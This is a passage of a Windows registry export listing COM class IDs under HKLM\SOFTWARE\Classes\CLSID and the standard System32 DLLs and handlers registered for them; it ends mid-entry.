HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{da158800-7434-4410-a0cd-e497c3b4a9da}\InProcHandler32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.Storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{da216253-d503-497c-b068-6391030a0d1e}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\exsmime.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DA3BC7D8-C8F3-4169-AA71-D65C40AA7129}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\cscui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{da620430-5f6c-447d-8091-c5757e275b37}\InProcHandler32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shcore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DA67B8AD-E81B-4c70-9B91-B417B5E33527}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\srchadmin.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DA825E1B-6830-43D7-835D-0B5AD82956A2}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\dpnet.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DA93E903-C843-11D2-A084-00C04F8EF9B5}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Common\sapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DAB7CCB2-EC94-4c7e-AB52-826D6ACD5249}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\coredpus.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DAC9F469-0C67-4643-9258-87EC128C5941}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Engines\SR\spsreng.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{daf95313-e44d-46af-be1b-cbacea2c3065}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\SearchFolder.dll,-323 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{daf95313-e44d-46af-be1b-cbacea2c3065}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SearchFolder.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DAFD8210-5711-4B91-9FE3-F75B7AE279BF}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\dsdmo.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DB3E3CFA-4CEE-4427-A2EB-33F85534B7F3}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DB5D1FF4-09D7-11D1-BB10-00C04FC9A3A3}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\filemgmt.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DB5D1FF5-09D7-11D1-BB10-00C04FC9A3A3}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\filemgmt.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DB6153E3-7AB7-4A67-AE62-1CAAEFBC64F4}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\eUICCsCSP.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{db6efb73-5153-43b7-8078-c6ffc4c0238c}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.Storage.Search.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DBD71B6B-F717-4A61-A914-2337BC50B0D6}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\tscfgwmi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DBFCA500-8C31-11D0-AA2C-00A0C92749A3}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\dmdskmgr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DC1C5A9C-E88A-4dde-A5A1-60F82A20AEF7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\comdlg32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DC626A64-D684-4627-83CB-44420ABDBD1A}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Common\sapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DC664FDD-D868-46EE-8780-8D196CB739F7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\AppxPackaging.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DC79A5C8-CCAD-4698-9034-C4C8068011C5}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\SyncHostPS.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DC7A02CD-2E47-406C-BA5A-B08EC00C4238}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\SysWOW64\fixmapi.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DC923725-0FDD-45E1-AE74-EA09182E739B}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\esscli.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DCB00009-570F-4A9B-8D69-199FDBA5723B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\nlmproxy.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\netprofm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DCC42FB9-F88D-43C2-B874-727DF0F75586}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\oobe\msoobedui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{dccc0bed-6066-11d1-8c13-00c04fd8d503}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\adsmsext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DCED8DB0-11A5-4b16-AB9D-4E28CA38C99F} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\netshell.dll,-1200 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DCED8DB0-11A5-4b16-AB9D-4E28CA38C99F}\Elevation IconReference REG_EXPAND_SZ @%SystemRoot%\system32\netshell.dll,-5 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DCED8DB0-11A5-4b16-AB9D-4E28CA38C99F}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\netcfgx.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DCF33DF4-B510-439F-832A-16B6B514F2A7}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\fastprox.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DD06A84F-83BD-4d01-8AB9-2389FEA0869E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\WlanMM.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DD1432D7-B76B-4227-9C57-D82E9D844441}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\coredpus.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DD313E04-FEFF-11d1-8ECD-0000F87A470C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DDACC952-01A7-4D00-8809-EEEE479779BC}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\enterprisecsps.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DDC05A5A-351A-4E06-8EAF-54EC1BC2DCEA}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\ApplicationFrame.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DDC0EED2-ADBE-40b6-A217-EDE16A79A0DE}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\credprovs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ddcc6bb8-4cd6-462a-9289-d82d2bee1ffd}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DDE33513-774E-4BCD-AE79-02F4ADFE62FC}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DDE5783A-88B9-11d2-84AD-00C04FA31A86}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\dsquery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DDECE4B2-979F-4CDB-9F58-B036FE5A510C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\FirewallControlPanel.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DE010DA1-289B-4232-8CD0-5112DCA6A7B3}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\vdsbas.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DE3F3560-3032-41B4-B6CF-F703B1B95640}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wsepno.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DE4874D1-FEEE-11d1-A0B0-00C04FA31A86}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\dsquery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DE4874D2-FEEE-11d1-A0B0-00C04FA31A86}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\dsquery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DE661907-527D-4d6a-B6A6-EBC7F88D9B95}\InprocServer32 (Default) REG_EXPAND_SZ %SYSTEMROOT%\System32\PeerDistCleaner.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DE77BA04-3C92-4d11-A1A5-42352A53E0E3}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\provsvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DE83650F-8CE4-40EA-A08E-6F0E5CD46F6B}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\audioeng.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DE9C1288-0F09-40ff-BA84-7F19279FA74B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\IdListen.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DEB01010-3A37-4d26-99DF-E2BB6AE3AC61}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\dmintf.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{deca92e0-af85-439e-9204-86679978da08}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\AppLockerCsp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DEE0CE93-8376-4DB5-A4F0-010596888B49}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DEEF2A9B-B3B7-46F2-A07F-D53340BF9E0F}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSync.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{def065bd-a9fa-402b-8775-ab48d88775db}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DF46C02A-3568-4765-AAD3-88F5E1D42F92}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DF60686C-2941-4893-80C0-F13173B719D3}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\provsvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{df6775de-380d-4c14-8b62-fb69912e6d30}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\usbui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DF9144AE-8785-4B2B-93AD-A775CE6B6C42}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DFE49CFE-CD09-11D2-9643-00C04f79ADF0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\cabview.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.Storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E018945B-AA86-4008-9BD4-6777A1E40C11}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e019c036-162f-4f57-a5bc-850e313210b7}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\eappcfgui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E031F9E8-A35A-45EA-B263-F85FDED0D539}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\PackageStateRoaming.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E0393303-90D4-4A97-AB71-E9B671EE2729}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\vds_ps.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E03E85B0-7BE3-4000-BA98-6C13DE9FA486}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\StructuredQuery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e04d75b6-ee0a-48a9-acd5-e39e0b1bb434}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\CapabilityAccessHandlers.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e07dfaca-e658-4ce5-89b2-05bbbf75e708}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e0ca5340-4534-11cf-b952-00aa0051fe20}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\nlhtml.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E0CBC546-8950-43DD-99A9-A418DB7DD0B5}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\WLanConn.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E0FA581D-2188-11D2-A739-00C04FA377A1}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\activeds.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\USERENV.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E1150CE9-5BD4-4044-8FE9-98CF40137A41}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\audioeng.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E1377990-BDFB-4D43-AD16-DF7F6DCB4EFE}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E13B6686-3F39-11D0-96F6-00A0C9191601}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\dmdskmgr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E13B6688-3F39-11D0-96F6-00A0C9191601}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\dmdskmgr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E13EF4E4-D2F2-11d0-9816-00C04FD91972}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E1553E07-5939-4CFD-BE24-3BCEBA2F148C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\XpsDocumentTargetPrint.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e1625daf-d7c8-474b-b5c0-1525431d462c}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSync.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E164F996-FF93-4675-BDD8-6C47AB0B86B1}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E16C0593-128F-11D1-97E4-00C04FB9618A}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\txflog.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E16C0594-128F-11D1-97E4-00C04FB9618A}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\txflog.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E17A999C-97F7-4213-BF6F-DE08E9D7ECF5}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\DMWmiBridgeProv1.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E19AF835-9413-48A3-BDCC-28BA0286E348}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wlidprov.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E19FF627-4C38-406D-9B4A-7973E0F539BA}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E1BA41AD-4A1D-418F-AABA-3D1196B423D3} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\sdchange.exe,-100 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E1C5D730-7E97-4D8A-9E42-BBAE87C2059F} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\wiaaut.dll,-3001 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E1C5D730-7E97-4D8A-9E42-BBAE87C2059F}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wiaaut.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E1C5D730-7E97-4D8A-9E42-BBAE87C2059F}\ToolboxBitmap32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wiaaut.dll, 103 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E1DE74AD-C368-4104-ADB1-57D00577247A}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\WlanMM.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E1F5AA5B-065C-4E29-B454-C1BBFE0819D2}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wlidprov.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E2085F28-FEB7-404A-B8E7-E659BDEAAA02}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\upnp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e2183960-9d58-4e9c-878a-4acc06ca564a}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e22b3065-b83a-4ffd-9b08-9e73841a442f}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\propsys.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E23A07D1-1E89-4B22-8411-051B40A0A357}\InprocServer32 (Default) REG_EXPAND_SZ %SYSTEMROOT%\System32\wbem\schedprov.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E23CE3EB-5608-4E83-BCEF-27B1987E51D7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e2403e98-663b-4df6-b234-687789db8560}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\rtffilt.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e2550429-5df2-48cd-9ea3-26ff682d8a17}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E25E3D72-2E16-435D-88FC-27475DA85152}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\WudfSMCClassExt.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E25E57E9-DA9C-4A35-A0D8-CFB5EA6AF7E6}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\AuditNativeSnapIn.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E2765AC3-564C-40F9-AC12-CD393FBAAB0F}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ntshrui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E296669F-B787-4A34-B23D-56F0AF1D450B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\WiFiConfigSP.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E2A4E630-7AD8-44f0-B6EE-D36EA4C6EB94} LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\ndfapi.dll,-40001 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E2A4E630-7AD8-44f0-B6EE-D36EA4C6EB94}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ndfapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E2AD2F90-AC32-4DF6-B47A-61458E559320}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\dscproxy.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E2AE5372-5D40-11D2-960E-00C04F8EE628}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Common\sapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e2b07466-5250-4fc2-8949-46bf91f8cad0}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\colbact.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E2B3C97F-6AE1-41AC-817A-F6F92166D7DD} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\FirewallControlPanel.dll,-12122 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e2bf9676-5f8f-435c-97eb-11607a5bedf7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ntshrui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E2CBCB87-9C07-4523-A78F-061499C83987}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\wmipcima.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E2DECFDB-BA0A-46F9-9452-8218C1A9AE45}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E2E7934B-DCE5-43C4-9576-7FE4F75E7480} InfoTip REG_EXPAND_SZ @%SystemRoot%\System32\timedate.cpl,-52#immutable1 LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\timedate.cpl,-51#immutable1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E2E7934B-DCE5-43C4-9576-7FE4F75E7480}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\timedate.cpl,-50 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E2E7934B-DCE5-43C4-9576-7FE4F75E7480}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\timedate.cpl HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e2eb4ca4-c96e-4da4-94b1-673c8334a5bb}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shcore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E2F33E30-B587-4f08-BF1A-F28D0F41000A}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E2F7A62A-862B-40AE-BBC2-5C0CA9A5B7E1}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\MMDevApi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e2fb4720-f45f-4a3c-8cb2-2060e12425c3}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfsrcsnk.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E2FE048A-318B-4c79-A934-95AF2BCADEAC}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e317d729-81b0-4257-926b-b8de5f3b0288}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\twinui.appcore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E31A5806-8FD2-48EC-A132-7C1E614AC5B1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSyncCore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E3250274-3AE3-472D-AA33-7BC11F195BAC}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\coredpus.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e345f35f-9397-435c-8f95-4e922c26259e}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\SearchFolder.dll,-323 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e345f35f-9397-435c-8f95-4e922c26259e}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SearchFolder.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E3633C03-DF7A-41E0-B903-CC349A05E021}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\blb_ps.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E36C2344-AF40-4FC0-B24C-4930B809F3E1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSyncCore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E3784839-6BD5-4702-A7B0-59C7592FB7B8}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\coredpus.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E388F56A-D03B-4A08-ADC3-E44CA937AD91}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e3a4e5ca-55b2-4a06-b1ab-8fbecc7bca4b}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe /sta {fcc2867c-69ea-4d85-8058-7c214e611c97} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E3A9BD50-51AE-410f-9706-0BA0D68B9A94}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\scavengeui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e3e478d6-a2f2-4791-89a3-21f5c78dc3ec}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E3E8B9D5-EA6E-4ECD-AC1F-933087551378}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\AppxPackaging.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E410F8AE-00A1-4A1B-8247-924705718354}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E413D040-6788-4C22-957E-175D1C513A34} InfoTip REG_EXPAND_SZ @%SystemRoot%\System32\SyncCenter.dll,-6104 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E413D040-6788-4C22-957E-175D1C513A34}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\SyncCenter.dll,-1000 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E413D040-6788-4C22-957E-175D1C513A34}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\SyncCenter.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E423AF7C-FC2D-11d2-B126-00805FC73204}\InprocServer32 (Default) REG_EXPAND_SZ 